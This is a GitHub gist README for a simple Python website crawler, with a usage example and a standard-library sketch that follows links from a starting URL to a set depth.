KSTARK007 / crawler.md
Created September 13, 2017 22:17 — forked from typehorror/crawler.md
Simple Website Crawler (in Python)

Simple Website Crawler

The following gist is an extract from the article Building a simple crawler. It crawls outward from a starting URL, following links for a given number of bounces.

Basic Usage

from crawler import Crawler
crawler = Crawler()
crawler.crawl('http://techcrunch.com/')

This displays the URLs.
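
To make the idea of crawling "for a given number of bounces" concrete, here is a minimal sketch of a depth-limited crawl using only the Python standard library. It is not the gist's actual Crawler class: the names crawl_links, LinkParser, fetch_html, and the max_depth and fetch parameters are all hypothetical and chosen for illustration. The sketch assumes a "bounce" means one hop along a link, so max_depth=1 returns the start URL plus the links found on that page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urldefrag
from urllib.request import urlopen


class LinkParser(HTMLParser):
    """Collects the href value of every <a> tag in a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def fetch_html(url):
    """Default fetcher (hypothetical helper): download a page as text."""
    with urlopen(url, timeout=10) as response:
        return response.read().decode("utf-8", errors="replace")


def crawl_links(start_url, max_depth=1, fetch=fetch_html):
    """Return the set of URLs reachable within max_depth bounces.

    Assumption: one bounce is one link hop from the start URL.
    """
    seen = {start_url}
    frontier = [start_url]
    for _ in range(max_depth):
        next_frontier = []
        for url in frontier:
            try:
                html = fetch(url)
            except Exception:
                continue  # skip pages that fail to load
            parser = LinkParser()
            parser.feed(html)
            for href in parser.links:
                # Resolve relative links and drop any #fragment.
                absolute = urldefrag(urljoin(url, href)).url
                if not absolute.startswith(("http://", "https://")):
                    continue  # ignore mailto:, javascript:, etc.
                if absolute not in seen:
                    seen.add(absolute)
                    next_frontier.append(absolute)
        frontier = next_frontier
    return seen
```

Calling crawl_links('http://techcrunch.com/', max_depth=1) would fetch that page over the network and return the set of links found on it. Passing a custom fetch function makes it possible to add caching or to test the traversal without network access.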
